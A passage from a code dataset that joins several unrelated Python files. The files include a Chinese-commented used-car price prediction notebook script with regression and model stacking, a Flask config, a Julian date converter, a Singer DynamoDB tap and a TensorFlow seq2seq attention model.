用于清洗异常值,默认用 box_plot(scale=3)进行清洗\n :param data: 接收 pandas 数据格式\n :param col_name: pandas 列名\n :param scale: 尺度\n :return:\n \"\"\"\n\n def box_plot_outliers(data_ser, box_scale):\n \"\"\"\n 利用箱线图去除异常值\n :param data_ser: 接收 pandas.Series 数据格式\n :param box_scale: 箱线图尺度,\n :return:\n \"\"\"\n iqr = box_scale * (data_ser.quantile(0.75) - data_ser.quantile(0.25))\n val_low = data_ser.quantile(0.25) - iqr\n val_up = data_ser.quantile(0.75) + iqr\n rule_low = 
(data_ser < val_low)\n rule_up = (data_ser > val_up)\n return (rule_low, rule_up), (val_low, val_up)\n\n data_n = data.copy()\n data_series = data_n[col_name]\n rule, value = box_plot_outliers(data_series, box_scale=scale)\n index = np.arange(data_series.shape[0])[rule[0] | rule[1]]\n print(\"Delete number is: {}\".format(len(index)))\n data_n = data_n.drop(index)\n data_n.reset_index(drop=True, inplace=True)\n print(\"Now column number is: {}\".format(data_n.shape[0]))\n index_low = np.arange(data_series.shape[0])[rule[0]]\n outliers = data_series.iloc[index_low]\n print(\"Description of data less than the lower bound is:\")\n print(pd.Series(outliers).describe())\n index_up = np.arange(data_series.shape[0])[rule[1]]\n outliers = data_series.iloc[index_up]\n print(\"Description of data larger than the upper bound is:\")\n print(pd.Series(outliers).describe())\n \n fig, ax = plt.subplots(1, 2, figsize=(10, 7))\n sns.boxplot(y=data[col_name], data=data, palette=\"Set1\", ax=ax[0])\n sns.boxplot(y=data_n[col_name], data=data_n, palette=\"Set1\", ax=ax[1])\n return data_n\n\n\n# %%\nTrain_data = outliers_proc(Train_data, 'power', scale = 3)\n\n\n# %%\n# 合并数据集方便处理\nTrain_data['train'] = 1\nTest_data['train'] = 0\ndata = pd.concat([Train_data, Test_data], ignore_index = False)\n\n\n# %%\n# used_time: 使用时间\n# 参数 errors = 'coerce': 将不能转化的数据(如格式错误)转化为 NaN\ndata['used_time'] = (pd.to_datetime(data['creatDate'], format='%Y%m%d', errors = 'coerce') - \n pd.to_datetime(data['regDate'], format='%Y%m%d', errors = 'coerce')).dt.days\nprint(\"NULL in used_time\", data['used_time'].isnull().sum())\n\n\n# %%\n# 从邮编中提取城市信息,相当于加入了先验知识\ndata['city'] = data['regionCode'].apply(lambda x : str(x)[:-3])\ndata = data # 话说这句干啥来着\n\n\n# %%\n# 计算某品牌的销售统计量\n# 这里要以 train 的数据计算统计量\nTrain_gb = Train_data.groupby(\"brand\")\nall_info = {}\nfor kind, kind_data in Train_gb:\n info = {}\n kind_data = kind_data[kind_data['price'] > 0]\n info['brand_amount'] = len(kind_data)\n info['brand_price_max'] = kind_data.price.max()\n info['brand_price_median'] = kind_data.price.median()\n info['brand_price_min'] = kind_data.price.min()\n info['brand_price_sum'] = kind_data.price.sum()\n info['brand_price_std'] = kind_data.price.std()\n info['brand_price_average'] = round(kind_data.price.sum() / (len(kind_data) + 1), 2)\n all_info[kind] = info\nbrand_fe = pd.DataFrame(all_info).T.reset_index().rename(columns={\"index\": \"brand\"})\ndata = data.merge(brand_fe, how='left', on='brand')\n\n\n# %%\n# 以power为例做数据分箱\n\nbin = [i*10 for i in range(31)]\ndata['power_bin'] = pd.cut(data['power'], bin, labels=False)\ndata[['power_bin', 'power']].head()\n\n\n# %%\n# 删除不需要的数据\ndata = data.drop(['creatDate', 'regDate', 'regionCode'], axis=1)\n\n\n# %%\nprint(data.shape)\ndata.columns\n\n\n# %%\n# 导出数据\ndata.to_csv('data_for_tree.csv', index=0)\n\n\n# %%\n# 通过调整数据类型,帮助我们减少数据在内存中占用的空间\n\ndef reduce_mem_usage(df):\n \"\"\" iterate through all the columns of a dataframe and modify the data type\n to reduce memory usage. 
\n \"\"\"\n start_mem = df.memory_usage().sum() / 1024**2\n print('Memory usage of dataframe is {:.2f} MB'.format(start_mem))\n \n for col in df.columns:\n col_type = df[col].dtype\n \n if col_type != object:\n c_min = df[col].min()\n c_max = df[col].max()\n if str(col_type)[:3] == 'int':\n if c_min > np.iinfo(np.int8).min and c_max < np.iinfo(np.int8).max:\n df[col] = df[col].astype(np.int8)\n elif c_min > np.iinfo(np.int16).min and c_max < np.iinfo(np.int16).max:\n df[col] = df[col].astype(np.int16)\n elif c_min > np.iinfo(np.int32).min and c_max < np.iinfo(np.int32).max:\n df[col] = df[col].astype(np.int32)\n elif c_min > np.iinfo(np.int64).min and c_max < np.iinfo(np.int64).max:\n df[col] = df[col].astype(np.int64) \n else:\n if c_min > np.finfo(np.float16).min and c_max < np.finfo(np.float16).max:\n df[col] = df[col].astype(np.float16)\n elif c_min > np.finfo(np.float32).min and c_max < np.finfo(np.float32).max:\n df[col] = df[col].astype(np.float32)\n else:\n df[col] = df[col].astype(np.float64)\n else:\n df[col] = df[col].astype('category')\n\n end_mem = df.memory_usage().sum() / 1024**2\n print('Memory usage after optimization is: {:.2f} MB'.format(end_mem))\n print('Decreased by {:.1f}%'.format(100 * (start_mem - end_mem) / start_mem))\n return df\n\n\n# %%\nsample_feature = reduce_mem_usage(pd.read_csv('data_for_tree.csv'))\n\n\n# %%\ncontinuous_feature_names = [x for x in sample_feature.columns if x not in ['price','brand','model','brand']]\ncontinuous_feature_names\n\n# %% [markdown]\n# ### OLS\n\n# %%\nsample_feature = sample_feature.dropna().replace('-', 0).reset_index(drop=True)\nsample_feature['notRepairedDamage'] = sample_feature['notRepairedDamage'].astype(np.float32)\n\ntrain = sample_feature[continuous_feature_names + ['price']]\ntrain_X = train[continuous_feature_names]\ntrain_y = train['price']\n\n\n# %%\nfrom sklearn.linear_model import LinearRegression\n\nmodel = LinearRegression(normalize=True)\nmodel = model.fit(train_X, train_y)\n\n# 查看截距和系数\n'intercept:'+ str(model.intercept_)\n\nsorted(dict(zip(continuous_feature_names, model.coef_)).items(), key=lambda x:x[1], reverse=True)\n\n\n# %%\nfrom matplotlib import pyplot as plt\n\nsubsample_index = np.random.randint(low=0, high=len(train_y), size=50)\n\nplt.scatter(train_X['v_9'][subsample_index], train_y[subsample_index], color='black')\nplt.scatter(train_X['v_9'][subsample_index], model.predict(train_X.loc[subsample_index]), color='blue')\nplt.xlabel('v_9')\nplt.ylabel('price')\nplt.legend(['True Price','Predicted Price'],loc='upper right')\nprint('The predicted price is obviously different from the true price')\nplt.show()\n\n\n# %%\n# 标签并不服从正态分布,不满足OLS的基本假设\n\nimport seaborn as sns\nprint('It is clear to see the price shows a typical exponential distribution')\nplt.figure(figsize=(15,5))\nplt.subplot(1,2,1)\nsns.distplot(train_y)\nplt.subplot(1,2,2)\nsns.distplot(train_y[train_y < np.quantile(train_y, 0.9)])\n\n\n# %%\n# 对数变换\ntrain_y_ln = np.log(train_y + 1)\n\nimport seaborn as sns\nprint('The transformed price seems like normal distribution')\nplt.figure(figsize=(15,5))\nplt.subplot(1,2,1)\nsns.distplot(train_y_ln)\nplt.subplot(1,2,2)\nsns.distplot(train_y_ln[train_y_ln < np.quantile(train_y_ln, 0.9)])\n\n\n# %%\nmodel = model.fit(train_X, train_y_ln)\n\nprint('intercept:'+ str(model.intercept_))\nsorted(dict(zip(continuous_feature_names, model.coef_)).items(), key=lambda x:x[1], reverse=True)\n\n\n# %%\nplt.scatter(train_X['v_9'][subsample_index], train_y[subsample_index], color='black')\nplt.scatter(train_X['v_9'][subsample_index], 
np.exp(model.predict(train_X.loc[subsample_index])), color='blue')\nplt.xlabel('v_9')\nplt.ylabel('price')\nplt.legend(['True Price','Predicted Price'],loc='upper right')\nprint('The predicted price seems normal after np.log transforming')\nplt.show()\n\n# %% [markdown]\n# ### 5-fold CV\n\n# %%\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn.metrics import mean_absolute_error, make_scorer\n\ndef log_transfer(func):\n def wrapper(y, yhat):\n result = func(np.log(y), np.nan_to_num(np.log(yhat)))\n return result\n return wrapper\n\nscores = cross_val_score(model, X=train_X, y=train_y, \n verbose=1, cv = 5, \n scoring=make_scorer(log_transfer(mean_absolute_error)))\n\n\n# %%\n# 未处理标签\nprint('AVG:', np.mean(scores))\n\n\n# %%\n# 处理标签\nscores = cross_val_score(model, X=train_X, y=train_y_ln, \n verbose=1, cv = 5, \n scoring=make_scorer(mean_absolute_error))\n\nprint('AVG:', np.mean(scores))\n\n\n# %%\nscores = pd.DataFrame(scores.reshape(1,-1))\nscores.columns = ['cv' + str(x) for x in range(1, 6)]\nscores.index = ['MAE']\nscores\n\n# %% [markdown]\n# ### 按时间4:1切分数据集\n\n# %%\nimport datetime\n\n\n# %%\nsample_feature = sample_feature.reset_index(drop=True)\nsplit_point = len(sample_feature) // 5 * 4\n\n\n# %%\ntrain = sample_feature.loc[:split_point].dropna()\nval = sample_feature.loc[split_point:].dropna()\n\n\n# %%\ntrain_X = train[continuous_feature_names]\ntrain_y_ln = np.log(train['price'] + 1)\nval_X = val[continuous_feature_names]\nval_y_ln = np.log(val['price'] + 1)\n\n\n# %%\nmodel = model.fit(train_X, train_y_ln)\nmean_absolute_error(val_y_ln, model.predict(val_X))\n\n\n# %%\n# 学习曲线\n\nfrom sklearn.model_selection import learning_curve, validation_curve\n\n\n# %%\ndef plot_learning_curve(estimator, title, X, y, ylim=None, cv=None,n_jobs=1, train_size=np.linspace(.1, 1.0, 5 )): \n plt.figure() \n plt.title(title) \n if ylim is not None: \n plt.ylim(*ylim) \n plt.xlabel('Training example') \n plt.ylabel('score') \n train_sizes, train_scores, test_scores = learning_curve(estimator, X, y, cv=cv, n_jobs=n_jobs, train_sizes=train_size, scoring = make_scorer(mean_absolute_error)) \n train_scores_mean = np.mean(train_scores, axis=1) \n train_scores_std = np.std(train_scores, axis=1) \n test_scores_mean = np.mean(test_scores, axis=1) \n test_scores_std = np.std(test_scores, axis=1) \n plt.grid()#区域 \n plt.fill_between(train_sizes, train_scores_mean - train_scores_std, \n train_scores_mean + train_scores_std, alpha=0.1, \n color=\"r\") \n plt.fill_between(train_sizes, test_scores_mean - test_scores_std, \n test_scores_mean + test_scores_std, alpha=0.1, \n color=\"g\") \n plt.plot(train_sizes, train_scores_mean, 'o-', color='r', \n label=\"Training score\") \n plt.plot(train_sizes, test_scores_mean,'o-',color=\"g\", \n label=\"Cross-validation score\") \n plt.legend(loc=\"best\") \n return plt \n\n\n# %%\nplot_learning_curve(LinearRegression(), 'Liner_model', \n train_X[:1000], train_y_ln[:1000], \n ylim=(0.0, 0.5), cv=5, n_jobs=1) \n\n# %% [markdown]\n# ### 多个模型对比\n\n# %%\ntrain = sample_feature[continuous_feature_names + ['price']].dropna()\n\ntrain_X = train[continuous_feature_names]\ntrain_y = train['price']\ntrain_y_ln = np.log(train_y + 1)\n\n# %% [markdown]\n# ### Ridge Regression & Lasso\n\n# %%\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.linear_model import Ridge\nfrom sklearn.linear_model import Lasso\n\n\n# %%\nmodels = [LinearRegression(),\n Ridge(),\n Lasso()]\n\nresult = dict()\n\n\n# %%\nfor model in models:\n model_name = 
str(model).split('(')[0]\n scores = cross_val_score(model, X=train_X, y=train_y_ln, verbose=0, cv = 5, scoring=make_scorer(mean_absolute_error))\n result[model_name] = scores\n print(model_name + ' is finished')\n\n\n# %%\n# 合并结果对比\n\nresult = pd.DataFrame(result)\nresult.index = ['cv' + str(x) for x in range(1, 6)]\nresult\n\n\n# %%\nmodel = LinearRegression().fit(train_X, train_y_ln)\nprint('intercept:'+ str(model.intercept_))\nsns.barplot(abs(model.coef_), continuous_feature_names)\n\n\n# %%\nmodel = Ridge().fit(train_X, train_y_ln)\nprint('intercept:'+ str(model.intercept_))\nsns.barplot(abs(model.coef_), continuous_feature_names)\n\n\n# %%\nmodel = Lasso().fit(train_X, train_y_ln)\nprint('intercept:'+ str(model.intercept_))\nsns.barplot(abs(model.coef_), continuous_feature_names)\n\n# %% [markdown]\n# ### Nonlinear Model\n\n# %%\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.svm import SVC\nfrom sklearn.tree import DecisionTreeRegressor\nfrom sklearn.ensemble import RandomForestRegressor\nfrom sklearn.ensemble import GradientBoostingRegressor\nfrom sklearn.neural_network import MLPRegressor\nfrom xgboost.sklearn import XGBRegressor\nfrom lightgbm.sklearn import LGBMRegressor\n\n\n# %%\nmodels = [LinearRegression(),\n DecisionTreeRegressor(),\n RandomForestRegressor(),\n GradientBoostingRegressor(),\n MLPRegressor(solver='lbfgs', max_iter=100), \n XGBRegressor(n_estimators = 100, objective='reg:squarederror'), \n LGBMRegressor(n_estimators = 100)]\n\n\n# %%\nresult = dict()\nfor model in models:\n model_name = str(model).split('(')[0]\n scores = cross_val_score(model, X=train_X, y=train_y_ln, verbose=0, cv = 5, scoring=make_scorer(mean_absolute_error))\n result[model_name] = scores\n print(model_name + ' is finished')\n\n\n# %%\nresult = pd.DataFrame(result)\nresult.index = ['cv' + str(x) for x in range(1, 6)]\nresult\n\n# %% [markdown]\n# ### 假装有分割线\n\n# %%\ndef build_model_lr(x_train,y_train):\n reg_model = linear_model.LinearRegression()\n reg_model.fit(x_train,y_train)\n return reg_model\n\ndef build_model_ridge(x_train,y_train):\n reg_model = linear_model.Ridge(alpha=0.8)#alphas=range(1,100,5)\n reg_model.fit(x_train,y_train)\n return reg_model\n\ndef build_model_lasso(x_train,y_train):\n reg_model = linear_model.LassoCV()\n reg_model.fit(x_train,y_train)\n return reg_model\n\ndef build_model_gbdt(x_train,y_train):\n estimator =GradientBoostingRegressor(loss='ls',subsample= 0.85,max_depth= 5,n_estimators = 100)\n param_grid = { \n 'learning_rate': [0.05,0.08,0.1,0.2],\n }\n gbdt = GridSearchCV(estimator, param_grid,cv=3)\n gbdt.fit(x_train,y_train)\n print(gbdt.best_params_)\n # print(gbdt.best_estimator_ )\n return gbdt\n\ndef build_model_xgb(x_train,y_train):\n model = xgb.XGBRegressor(n_estimators=120, learning_rate=0.08, gamma=0, subsample=0.8, colsample_bytree=0.9, max_depth=5) #, objective ='reg:squarederror'\n model.fit(x_train, y_train)\n return model\n\ndef build_model_lgb(x_train,y_train):\n estimator = lgb.LGBMRegressor(num_leaves=63,n_estimators = 100)\n param_grid = {\n 'learning_rate': [0.01, 0.05, 0.1],\n }\n gbm = GridSearchCV(estimator, param_grid)\n gbm.fit(x_train, y_train)\n return gbm\n\n\n# %%\nnumerical_cols = data.select_dtypes(exclude = 'object').columns\nnumerical_cols\n\n\n# %%\n# feature_cols = [col for col in numerical_cols if col not in ['SaleID','name','regDate','price']]\nfeature_cols = [col for col in numerical_cols if col not in 
['SaleID','name','regDate','price','creatDate','regionCode','notRepairedDamage','train']]\nprint(feature_cols)\n\n\n# %%\nX_data = (data[data[\"train\"] == 1])[feature_cols]\nY_data = (data[data[\"train\"] == 1])[\"price\"]\nX_test = (data[data[\"train\"] == 0])[feature_cols]\n\nX_data = X_data.fillna(-1)\nX_test = X_test.fillna(-1)\n\nprint('X train shape:',X_data.shape)\nprint('X test shape:',X_test.shape)\n\n# %% [markdown]\n# ### XGBoost的五折交叉回归验证实现\n\n# %%\n## xgb\n\nimport xgboost as xgb\nimport lightgbm as lgb\nfrom sklearn.model_selection import StratifiedKFold\nfrom sklearn.model_selection import train_test_split\n\nfrom sklearn import linear_model\nfrom sklearn import preprocessing\nfrom sklearn.svm import SVR\nfrom sklearn.decomposition import PCA,FastICA,FactorAnalysis,SparsePCA\n\nimport matplotlib.gridspec as gridspec\nfrom sklearn import datasets\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.naive_bayes import GaussianNB \nfrom sklearn.ensemble import RandomForestClassifier\n# from mlxtend.classifier import StackingClassifier\nfrom sklearn.model_selection import cross_val_score, train_test_split\n# from mlxtend.plotting import plot_learning_curves\n# from mlxtend.plotting import plot_decision_regions\n\nfrom sklearn.model_selection import GridSearchCV,cross_val_score\nfrom sklearn.ensemble import RandomForestRegressor,GradientBoostingRegressor\n\nfrom sklearn.metrics import mean_squared_error, mean_absolute_error\n\n\n# %%\n\n\nxgr = xgb.XGBRegressor(n_estimators=120, learning_rate=0.1, subsample=0.8, colsample_bytree=0.9, max_depth=7) # ,objective ='reg:squarederror'\n\nscores_train = []\nscores = []\n\n## 5折交叉验证方式\nsk=StratifiedKFold(n_splits=5,shuffle=True,random_state=0)\nfor train_ind,val_ind in sk.split(X_data,Y_data):\n \n train_x=X_data.iloc[train_ind].values\n train_y=Y_data.iloc[train_ind]\n val_x=X_data.iloc[val_ind].values\n val_y=Y_data.iloc[val_ind]\n \n xgr.fit(train_x,train_y)\n pred_train_xgb=xgr.predict(train_x)\n pred_xgb=xgr.predict(val_x)\n \n score_train = mean_absolute_error(train_y,pred_train_xgb)\n scores_train.append(score_train)\n score = mean_absolute_error(val_y,pred_xgb)\n scores.append(score)\n\nprint('Train mae:',np.mean(scores_train))\nprint('Val mae',np.mean(scores))\n\n# %% [markdown]\n# ### 用多种方法\n\n# %%\n## Split data with val\nx_train,x_val,y_train,y_val = train_test_split(X_data,Y_data,test_size=0.3)\n\n## Train and Predict\nprint('Predict LR...')\nmodel_lr = build_model_lr(x_train,y_train)\nval_lr = model_lr.predict(x_val)\nsubA_lr = model_lr.predict(X_test)\n\nprint('Predict Ridge...')\nmodel_ridge = build_model_ridge(x_train,y_train)\nval_ridge = model_ridge.predict(x_val)\nsubA_ridge = model_ridge.predict(X_test)\n\nprint('Predict Lasso...')\nmodel_lasso = build_model_lasso(x_train,y_train)\nval_lasso = model_lasso.predict(x_val)\nsubA_lasso = model_lasso.predict(X_test)\n\nprint('Predict GBDT...')\nmodel_gbdt = build_model_gbdt(x_train,y_train)\nval_gbdt = model_gbdt.predict(x_val)\nsubA_gbdt = model_gbdt.predict(X_test)\n\n\n# %%\nprint('predict XGB...')\nmodel_xgb = build_model_xgb(x_train,y_train)\nval_xgb = model_xgb.predict(x_val)\nsubA_xgb = model_xgb.predict(X_test)\n\nprint('predict lgb...')\nmodel_lgb = build_model_lgb(x_train,y_train)\nval_lgb = model_lgb.predict(x_val)\nsubA_lgb = model_lgb.predict(X_test)\n\n# %% [markdown]\n# ### 加权融合\n\n# %%\ndef Weighted_method(test_pre1,test_pre2,test_pre3,w=[1/3,1/3,1/3]):\n Weighted_result = 
w[0]*pd.Series(test_pre1)+w[1]*pd.Series(test_pre2)+w[2]*pd.Series(test_pre3)\n return Weighted_result\n\n## Init the Weight\nw = [0.3,0.4,0.3]\n\n## 测试验证集准确度\nval_pre = Weighted_method(val_lgb,val_xgb,val_gbdt,w)\nMAE_Weighted = mean_absolute_error(y_val,val_pre)\nprint('MAE of Weighted of val:',MAE_Weighted)\n\n## 预测数据部分\nsubA = Weighted_method(subA_lgb,subA_xgb,subA_gbdt,w)\n\n## 生成提交文件\nsub = pd.DataFrame()\nsub['SaleID'] = X_test.index\nsub['price'] = subA\nsub.to_csv('./sub_Weighted.csv',index=False)\n\n\n# %%\n## 与简单的LR(线性回归)进行对比\nval_lr_pred = model_lr.predict(x_val)\nMAE_lr = mean_absolute_error(y_val,val_lr_pred)\nprint('MAE of lr:',MAE_lr)\n\n# %% [markdown]\n# ### Stacking 融合\n\n# %%\n## Stacking\n\n## 第一层\ntrain_lgb_pred = model_lgb.predict(x_train)\ntrain_xgb_pred = model_xgb.predict(x_train)\ntrain_gbdt_pred = model_gbdt.predict(x_train)\n\nStrak_X_train = pd.DataFrame()\nStrak_X_train['Method_1'] = train_lgb_pred\nStrak_X_train['Method_2'] = train_xgb_pred\nStrak_X_train['Method_3'] = train_gbdt_pred\n\nStrak_X_val = pd.DataFrame()\nStrak_X_val['Method_1'] = val_lgb\nStrak_X_val['Method_2'] = val_xgb\nStrak_X_val['Method_3'] = val_gbdt\n\nStrak_X_test = pd.DataFrame()\nStrak_X_test['Method_1'] = subA_lgb\nStrak_X_test['Method_2'] = subA_xgb\nStrak_X_test['Method_3'] = subA_gbdt\n\n\n# %%\nStrak_X_test.head()\n\n\n# %%\n## level2-method \nmodel_lr_Stacking = build_model_lr(Strak_X_train,y_train)\n## 训练集\ntrain_pre_Stacking = model_lr_Stacking.predict(Strak_X_train)\nprint('MAE of Stacking-LR:',mean_absolute_error(y_train,train_pre_Stacking))\n\n## 验证集\nval_pre_Stacking = model_lr_Stacking.predict(Strak_X_val)\nprint('MAE of Stacking-LR:',mean_absolute_error(y_val,val_pre_Stacking))\n\n## 预测集\nprint('Predict Stacking-LR...')\nsubA_Stacking = model_lr_Stacking.predict(Strak_X_test)\n\n\n# %%\nsubA_Stacking[subA_Stacking<10]=10 ## 去除过小的预测值\n\nsub = pd.DataFrame()\nsub['SaleID'] = Test_data.SaleID\nsub['price'] = subA_Stacking\nsub.to_csv('./sub_Stacking.csv',index=False)\n\n\n# %%\n\n\n","sub_path":"SecondhandCarPrediction/finalPY.py","file_name":"finalPY.py","file_ext":"py","file_size_in_byte":23085,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"254110082","text":"import os\n# uncomment the line below for postgres database url from environment variable\n# postgres_local_base = os.environ['DATABASE_URL']\n# app/main/config.py\nclass Config:\n DB = {\n 'addr' : 'localhost',\n 'id' : 'root',\n 'pass' : 'root'\n }\n SECRET_KEY = os.getenv('SECRET_KEY', 'my_precious_secret_key')\n DEBUG = False\n\nclass DevelopmentConfig(Config):\n print('i am Dev config')\n DEBUG = True\n Config.DB['addr'] = '127.0.0.1'\n Config.DB['db'] = 'dev_table'\n SQLALCHEMY_TRACK_MODIFICATIONS = False\n\nclass TestingConfig(Config):\n print('i am Testing config')\n Config.DB['addr'] = '255.255.255.255'\n Config.DB['db'] = 'test_table'\n DEBUG = True\n TESTING = True\n PRESERVE_CONTEXT_ON_EXCEPTION = False\n SQLALCHEMY_TRACK_MODIFICATIONS = False\n\nclass ProductionConfig(Config):\n print('i am Prod config')\n DEBUG = False\n\nconfig_by_name = dict(\n dev=DevelopmentConfig,\n test=TestingConfig,\n prod=ProductionConfig\n)\n\nkey = Config.SECRET_KEY","sub_path":"app/main/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1012,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"510297824","text":"# Function jd_to_dvec(jd), returns array A\n# Created by Jason Chen 10/5/18\n# 
Converts input of a Julian date (a float), jd, to an array A,\n# the equivalent Gregorian date [Year, Month, Day, Hour, Minute, Second]\n# Requires from jdcal import gcal2jd, jd2gcal\n\nfrom jdcal import jd2gcal\n\n\ndef jd_to_dvec(jd):\n ps = jd - 2400000.5 # Done to increase time precision\n epochvec = list(jd2gcal(2400000.5, ps)) # Converts tuple to list\n hours = int(epochvec[3]*24)\n # Sets jdarray[4] to decimal of hours\n epochvec.append(epochvec[3]*24 - hours)\n epochvec[3] = hours\n minutes = int(epochvec[4]*60)\n epochvec.append(epochvec[4]*60 - minutes)\n epochvec[4] = minutes\n epochvec[5] = (epochvec[5]*60)\n return epochvec\n","sub_path":"src/jd_to_dvec.py","file_name":"jd_to_dvec.py","file_ext":"py","file_size_in_byte":712,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"479816055","text":"\"\"\"DynamoDB tap class.\"\"\"\n\nfrom typing import List\n\nfrom botocore.exceptions import ClientError\nfrom singer_sdk import Tap, Stream\nfrom singer_sdk import typing as th\n\nfrom tap_dynamodb.streams import DynamicStream\nfrom tap_dynamodb import dynamodb\nfrom tap_dynamodb.schema import flatten_json, infer_schema, merge_schemas\nfrom tap_dynamodb.sync_strategies.full_table import scan_table\nfrom tap_dynamodb.deserialize import Deserializer\n\n\nclass TapDynamoDB(Tap):\n \"\"\"DynamoDB tap class.\"\"\"\n name = \"tap-dynamodb\"\n\n config_jsonschema = th.PropertiesList(\n th.Property(\"region_name\", th.StringType, required=True),\n th.Property(\"account_id\", th.StringType, required=True),\n th.Property(\"external_id\", th.StringType, required=True),\n th.Property(\"role_name\", th.StringType, required=True),\n th.Property(\"use_local_dynamo\", th.BooleanType, default=False, required=False),\n th.Property('num_inference_records', th.NumberType, default=50, required=False),\n th.Property('tables_to_discover', th.ArrayType(th.StringType), default=[], required=False),\n ).to_dict()\n\n def discover_streams(self) -> List[Stream]:\n \"\"\"Return a list of discovered streams (i.e., DynamoDB tables for the given account and region).\"\"\"\n if not self.config.get('use_local_dynamo'):\n dynamodb.setup_aws_client(self.config)\n client = dynamodb.get_client(self.config)\n\n try:\n response = client.list_tables()\n except ClientError:\n raise Exception(\"Authorization to AWS failed. 
Please ensure the role and \"\n \"policy are configured correctly on your AWS account.\")\n\n config_table_list = self.config.get('tables_to_discover')\n table_list = config_table_list if config_table_list else response.get('TableNames')\n\n streams = [x for x in\n (self.discover_table_schema(client, table) for table in table_list)\n if x is not None]\n\n return streams\n\n def discover_table_schema(self, client, table_name):\n try:\n table_info = client.describe_table(TableName=table_name).get('Table', {})\n except ClientError:\n self.logger.info(f'Access to table {table_name} was denied, skipping')\n return None\n\n # write stream metadata\n key_props = [key_schema.get('AttributeName') for key_schema in table_info.get('KeySchema', [])]\n results = scan_table(table_name, None, None, self.config, True)\n\n orig_projection = ''\n schema = th.PropertiesList().to_dict()\n for result in results:\n i = 0\n for item in result.get('Items', []):\n orig_projection = \",\".join(item.keys())\n record = Deserializer().deserialize_item(item)\n\n if type(record) is not dict:\n raise ValueError(\"Input must be a dict object.\")\n\n flat_record = flatten_json(record, self.config.get('except_keys', []))\n new_schema = infer_schema(flat_record)\n schema = merge_schemas(schema, new_schema.to_dict())\n\n i += 1\n if i > self.config.get('num_inference_records', 50):\n break\n break\n\n return DynamicStream(\n tap=self,\n name=table_name,\n primary_keys=key_props,\n replication_key=None,\n schema=schema,\n client=client,\n orig_projection=orig_projection,\n )\n","sub_path":"tap_dynamodb/tap.py","file_name":"tap.py","file_ext":"py","file_size_in_byte":3541,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"466122026","text":"shopping_list = [\"banana\", \"orange\", \"apple\"]\n\nstock = {\n \"banana\": 6,\n \"apple\": 0,\n \"orange\": 32,\n \"pear\": 15\n}\n\nprices = {\n \"banana\": 4,\n \"apple\": 2,\n \"orange\": 1.5,\n \"pear\": 3\n}\n\n# Write your code below!\ndef compute_bill(food):\n total=0\n for f in food:\n if stock[f]>0:\n total+=prices[f]\n stock[f]-=1\n return total\n\nlloyd = {\n \"name\": [\"Lloyd\"],\n \"homework\": [],\n \"quizzes\": [],\n \"tests\": [],\n }\nprint(lloyd[\"name\"])","sub_path":"firstProj/firstProject.py","file_name":"firstProject.py","file_ext":"py","file_size_in_byte":491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"559381862","text":"import numpy as np\nimport tensorflow as tf\n\nclass Encoder(tf.keras.Model):\n def __init__(self,vocab_size,embeddings_dim,units,batch_size):\n super(Encoder,self).__init__()\n self.word_embeddings = tf.Variable(\n initial_value=tf.random.truncated_normal(shape=(vocab_size, embeddings_dim)),\n trainable=True\n )\n self.bigru_1=tf.keras.layers.Bidirectional(\n layer=tf.keras.layers.GRU(units=units,return_sequences=True,return_state=False),\n merge_mode=\"sum\"\n )\n self.bigru_2 = tf.keras.layers.Bidirectional(\n layer=tf.keras.layers.GRU(units=units, return_sequences=True, return_state=True),\n merge_mode = \"sum\"\n )\n\n\n def __call__(self,word_ids,mask,training=True):\n inputs=tf.nn.embedding_lookup(params=self.word_embeddings,ids=word_ids)\n outputs=self.bigru_1(inputs=inputs,mask=mask,training=training)\n outputs,states_f,states_b=self.bigru_2(inputs=outputs,mask=mask,training=training)\n states=states_f+states_b\n #print(\"encoder outputs:\\n\",outputs)\n #print(\"encoder state:\\n\",states)\n return outputs,states\n\n\nclass 
Decoder(tf.keras.Model):\n def __init__(self,vocab_size,embeddings_dim,units,batch_size):\n super(Decoder,self).__init__()\n self.word_embeddings = tf.Variable(\n initial_value=tf.random.truncated_normal(shape=(vocab_size, embeddings_dim)),\n trainable=True\n )\n self.gru_1 = tf.keras.layers.GRU(\n units=units,\n return_sequences=True,\n return_state=False\n )\n self.gru_2 = tf.keras.layers.GRU(\n units=units,\n return_sequences=True,\n return_state=True\n )\n\n self.attention = BahdanauAttention(hidden_units=units)\n self.linear=tf.keras.layers.Dense(units=vocab_size)\n\n\n def __call__(self, word_ids,pre_states,encoder_outputs):\n '''\n 解码器解码一个时间步的信息\n :param word_ids: 输入的word的id,形状为[batch_size,1],因为只有一个时间步\n :param pre_states: 解码器的上一个状态,形状为[batch_size,dim]\n :param encoder_outputs: encoder的全部输出,形状为[batch_size,max_time,dim]\n :return:\n '''\n inputs=tf.nn.embedding_lookup(params=self.word_embeddings,ids=word_ids) #[batch_size,1,embedding_dim]\n #print(\"decoder inputs.shape\",inputs)\n\n attention_weights, context_vector=self.attention(\n query=pre_states,\n keys=encoder_outputs,\n values=encoder_outputs\n )\n #print(\"attention_weights:\\n\",attention_weights)\n #print(\"contect vector:\\n\",context_vector)\n\n inputs=tf.concat(\n values=[inputs,tf.expand_dims(input=context_vector,axis=1)],\n axis=-1\n ) #[batch_size,1,embeddings_dim+encoder_dim]\n #print(\"decoder inputs.shape\",inputs)\n\n #output:[batch_size,1,hidden_units] states:[batch_size,hidden_units]\n outputs=self.gru_1(inputs=inputs,initial_state=pre_states)\n outputs, states = self.gru_2(inputs=outputs, initial_state=pre_states)\n outputs=tf.reshape(tensor=outputs,shape=(-1,outputs.shape[2])) #[batch_size,hidden_units]\n outputs=self.linear(outputs) #[batch_size,vocab_size]\n\n # print(\"decoder outputs:\\n\", outputs)\n # print(\"decoder state:\\n\", states)\n\n return outputs,states,attention_weights\n\n\n\nclass BahdanauAttention(tf.keras.Model):\n def __init__(self,hidden_units):\n '''\n 